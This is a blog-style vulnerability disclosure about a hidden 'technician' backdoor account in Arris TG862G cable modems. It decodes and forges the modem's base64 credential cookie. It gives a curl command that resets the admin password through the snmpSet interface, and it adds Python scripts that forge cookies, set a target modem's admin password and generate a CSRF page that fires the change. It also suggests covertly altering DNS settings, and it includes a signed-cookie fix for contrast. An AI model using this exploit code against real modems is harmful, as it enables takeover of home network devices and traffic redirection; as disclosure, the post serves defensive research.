Saturday, January 20, 2024

Arris Cable Modem Backdoor - I'm A Technician, Trust Me.

Vendor backdoors are the worst. Sloppy coding that leads to an unintentional "bugdoor" is somewhat defensible, but a flat-out backdoor is never acceptable. Today's example is brought to you by Arris. A great quote from their site -
Subscribers want their internet to be two things, fast and worry free. Cable operators deploy services to meet the speed expectations, and trust ARRIS to provide the cable modems that deliver the reliability.
Nothing spells "trust" and "worry free" like a backdoor account, right?! Anyway, the following was observed on an Arris TG862G cable modem running firmware version TS070563_092012_MODEL_862_GW.

After successfully providing the correct login and password to the modem's administration page, the following cookie is set (client side):
Cookie: credential=eyJ2YWxpZCI6dHJ1ZSwidGVjaG5pY2lhbiI6ZmFsc2UsImNyZWRlbnRpYWwiOiJZV1J0YVc0NmNHRnpjM2R2Y21RPSIsInByaW1hcnlPbmx5IjpmYWxzZSwiYWNjZXNzIjp7IkFMTCI6dHJ1ZX0sIm5hbWUiOiJhZG1pbiJ9
All requests must carry a valid "credential" cookie (this was not the case in a previous firmware release - whoops); if the cookie is missing, the modem replies with "PLEASE LOGIN". The cookie value is just a base64-encoded JSON object:
{"valid":true,"technician":false,"credential":"YWRtaW46cGFzc3dvcmQ=","primaryOnly":false,"access":{"ALL":true},"name":"admin"}
And after base64 decoding the "credential" value we get:
{"valid":true,"technician":false,"credential":"admin:password","primaryOnly":false,"access":{"ALL":true},"name":"admin"}
Sweet, the device sends your credentials on every authenticated request (over plain HTTP, no HTTPS); essentially they have reinvented basic auth, call it basic-auth 2.0. As the kids say, "YOLO". The part that stuck out to me is the "technician" value set to "false". Swapping it to "true" didn't do anything exciting, but after messing around a bit I found that the following cookie worked wonderfully:
Cookie: credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9
Which decodes to the following:
{"credential":"dGVjaG5pY2lhbjo="}
And finally:
{"credential":"technician:"} 
Awesome, the username is "technician" and the password is empty. Trying to log into the web interface with these credentials does not work, though :(
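To make the two-layer encoding concrete, here is a small Python helper, added as an example for this write-up and not code from the original post or from Arris: it peels both base64 layers of the captured admin cookie, rebuilds the minimal "technician" cookie from the user:password pair that is the only thing the modem actually checks, and, for contrast, shows the kind of HMAC-signed session cookie a sane design would issue instead. The signing scheme, secret, nonce and expiry in the second half are my own illustration; nothing like it ships on the modem.

```python
import base64
import hashlib
import hmac
import json
import secrets
import time

# Cookie values quoted in the post: the one set after a real admin login, and the forged one.
ADMIN_COOKIE = "eyJ2YWxpZCI6dHJ1ZSwidGVjaG5pY2lhbiI6ZmFsc2UsImNyZWRlbnRpYWwiOiJZV1J0YVc0NmNHRnpjM2R2Y21RPSIsInByaW1hcnlPbmx5IjpmYWxzZSwiYWNjZXNzIjp7IkFMTCI6dHJ1ZX0sIm5hbWUiOiJhZG1pbiJ9"
TECH_COOKIE = "eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9"


def decode_credential_cookie(cookie):
    """Peel both base64 layers of the TG862G 'credential' cookie.

    Returns the outer JSON object plus 'user' and 'password' recovered from the
    inner base64 'credential' field ("user:password", plain basic-auth style).
    """
    outer = json.loads(base64.b64decode(cookie))
    user, _, password = base64.b64decode(outer["credential"]).decode().partition(":")
    return {**outer, "user": user, "password": password}


def forge_cookie(user, password):
    """Build the minimal cookie the modem accepts: only 'credential' is looked at,
    so 'valid', 'technician', 'access' and friends can simply be left out."""
    inner = base64.b64encode(f"{user}:{password}".encode()).decode()
    outer = json.dumps({"credential": inner}, separators=(",", ":"))
    return base64.b64encode(outer.encode()).decode()


# --- What a sane design looks like (my illustration for contrast, not Arris code) ---
# Never put the password, or any trust flag the client can flip, in the cookie.
# Issue a token that carries only identity and expiry, MAC it with a server-side
# secret, and verify the MAC before trusting a single field of it.

def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).decode().rstrip("=")


def _unb64url(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def issue_session_cookie(secret, user, ttl=900, now=None):
    """Return '<payload>.<hmac-sha256>' where payload is {name, exp, nonce}."""
    now = int(time.time()) if now is None else now
    payload = {"name": user, "exp": now + ttl, "nonce": secrets.token_hex(8)}
    body = _b64url(json.dumps(payload, separators=(",", ":")).encode())
    sig = hmac.new(secret, body.encode(), hashlib.sha256).hexdigest()
    return f"{body}.{sig}"


def verify_session_cookie(secret, cookie, now=None):
    """Return the payload only if the MAC checks and the token is unexpired, else None."""
    now = int(time.time()) if now is None else now
    body, _, sig = cookie.rpartition(".")
    if not body:
        return None
    expected = hmac.new(secret, body.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, sig):
        return None  # tampered, e.g. 'name' swapped for 'technician'
    payload = json.loads(_unb64url(body))
    if payload["exp"] <= now:
        return None
    return payload


def tamper(cookie, **changes):
    """Rewrite the signed payload without re-signing: what an attacker without the
    secret can do, and exactly what the TG862G cookie lets them get away with."""
    body, _, sig = cookie.rpartition(".")
    payload = json.loads(_unb64url(body))
    payload.update(changes)
    return f"{_b64url(json.dumps(payload, separators=(',', ':')).encode())}.{sig}"


if __name__ == "__main__":
    print(decode_credential_cookie(ADMIN_COOKIE))
    print(forge_cookie("technician", "") == TECH_COOKIE)   # the post's forged cookie, reproduced
    key = secrets.token_bytes(32)
    good = issue_session_cookie(key, "admin")
    print(verify_session_cookie(key, good))
    print(verify_session_cookie(key, tamper(good, name="technician")))  # None
```

The first half is the whole attack surface in six lines: there is no signature, so anything the cookie says about the user is the user's own claim. The second half is the fix in miniature; an opaque random session ID looked up server-side is just as good and avoids having a secret to rotate at all.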

That is fairly odd. I can't think of a good reason for a hidden account that cannot log into the UI. So what exactly can you do with this account? Well, the web application is basically an HTML/JS wrapper around some CGI that gets and sets SNMP values on the modem. It is worth noting that on previous firmware revisions the CGI calls did NOT require any authentication and could be called without a valid "credential" cookie. That bug was killed a few years ago at HOPE 9.

Now we can resurrect the ability to get and set SNMP values by presenting our "technician" cookie:

That's neat, but we would much rather be using the fancy "web 2.0" UI that a normal user is accustomed to, instead of manually setting SNMP values like some sort of neckbearded Unix admin. Taking a look at the password change functionality appeared to be a dead end, as it requires the previous password to set a new one:

Surprisingly, the application does check the value of the old password too! Back to digging around; the following was observed in the "mib.js" file:
SysCfg.AdminPassword= new Scalar("AdminPassword","1.3.6.1.4.1.4115.1.20.1.1.5.1",4);
It appears that the OID "1.3.6.1.4.1.4115.1.20.1.1.5.1" holds the value of the "Admin" password! Using the "technician" account to get/walk this OID comes up empty:
HTTP/1.1 200 OK
Date: Tue, 23 Sep 2014 19:58:40 GMT
Server: lighttpd/1.4.26-devel-5842M
Content-Length: 55
{
"1.3.6.1.4.1.4115.1.20.1.1.5.1.0":"",
"1":"Finish"
}
What about setting a new value? Surely that will not work....

That response looks hopeful. We can now log in as the "admin" user with the password "krad_password":

This functionality can be wrapped up in the following curl command:
curl -isk -X 'GET' -b 'credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9' 'http://192.168.100.1:8080/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.5.1.0=krad_password;4;'
Of course, if you change the password you wouldn't be very sneaky; a better approach would be reconfiguring the modem's DNS settings, perhaps? It's also worth noting that the SNMP set/get is CSRF'able: it is a plain GET authenticated only by a cookie the browser attaches on its own, so all you need is to catch a user who has recently logged into their modem.
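The same request, as an added Python example rather than the post's own tooling: it builds the snmpSet URL in exactly the shape the curl command above uses, parses the JSON the CGI returns (the "1":"Finish" sentinel seen in the get response), refuses to continue if the modem answers PLEASE LOGIN, and renders the one-line HTML page that turns the set into a cross-site request. Two things here are assumptions and not from the post: the get endpoint's path and parameter name (only the get response is shown above, so snmp_get_url is a guess), and the reading of the trailing "4" as the ASN.1 OCTET STRING type code. The host, port and new password are placeholders.

```python
import json
import sys
import urllib.parse
import urllib.request

# Values taken from the post: the forged cookie and the AdminPassword OID from mib.js.
TECH_COOKIE = "eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9"   # {"credential":"technician:"}
ADMIN_PASSWORD_OID = "1.3.6.1.4.1.4115.1.20.1.1.5.1"            # SysCfg.AdminPassword
# The ";4;" suffix in the curl command and the trailing 4 in the Scalar() call are the
# value's type code; treating it as the ASN.1 OCTET STRING tag (4) is my assumption.
OCTET_STRING = 4


def snmp_set_url(base, oid, value, type_code=OCTET_STRING, instance=0):
    """Build the snmpSet URL in the shape the post's curl command uses:
    <base>/snmpSet?oid=<oid>.<instance>=<value>;<type>;
    """
    param = f"{oid}.{instance}={value};{type_code};"
    return f"{base}/snmpSet?oid={urllib.parse.quote(param, safe='=;.')}"


def snmp_get_url(base, oid, instance=0):
    """ASSUMPTION: the post shows only the get *response*. The /snmpGet path and the
    'oids' parameter name used here are guesses, not taken from the page."""
    return f"{base}/snmpGet?oids={oid}.{instance};"


def parse_snmp_response(body):
    """The CGI answers with a JSON object mapping OID -> value plus a "1":"Finish"
    sentinel. Returns (finished, {oid: value}) with the sentinel stripped."""
    obj = json.loads(body)
    finished = obj.pop("1", None) == "Finish"
    return finished, obj


def snmp_request(url, cookie=TECH_COOKIE, timeout=5):
    """Issue the request with the forged cookie over plain HTTP, like the modem's own UI.
    A body of PLEASE LOGIN means the cookie was rejected, i.e. the hole is closed."""
    req = urllib.request.Request(url, headers={"Cookie": f"credential={cookie}"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        body = resp.read().decode(errors="replace")
    if "PLEASE LOGIN" in body:
        raise PermissionError("modem rejected the credential cookie")
    return parse_snmp_response(body)


def csrf_page(set_url):
    """Why the set is CSRF-able: it is a plain GET authenticated only by a cookie the
    victim's browser attaches by itself, so an <img> on any page is enough to fire it."""
    return f'<html><body><img src="{set_url}" alt=""></body></html>'


if __name__ == "__main__":
    # Usage: python3 tg862g_check.py http://192.168.100.1:8080 new_password
    base, new_password = sys.argv[1], sys.argv[2]
    finished, values = snmp_request(snmp_get_url(base, ADMIN_PASSWORD_OID))
    print("get:", finished, values)      # the post shows "" here: the OID is write-only
    finished, values = snmp_request(snmp_set_url(base, ADMIN_PASSWORD_OID, new_password))
    print("set:", finished, values)
```

The get-then-set order matters as a check, not just as an attack: an empty string back from the get combined with a successful set is the write-only behaviour the post describes, and a PLEASE LOGIN on the first request with the technician cookie is the quickest way to tell whether a given firmware build still honours the account.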

The real pain here is that Arris keeps their firmware locked up tightly and only allows cable operators to download revisions/fixes/updates, so you are at the mercy of your cable operator. Even if Arris decides it's worth the time and effort to patch this backdoor, you as the end user CANNOT update your device, because the interface doesn't provide that functionality to you! Next level engineering.

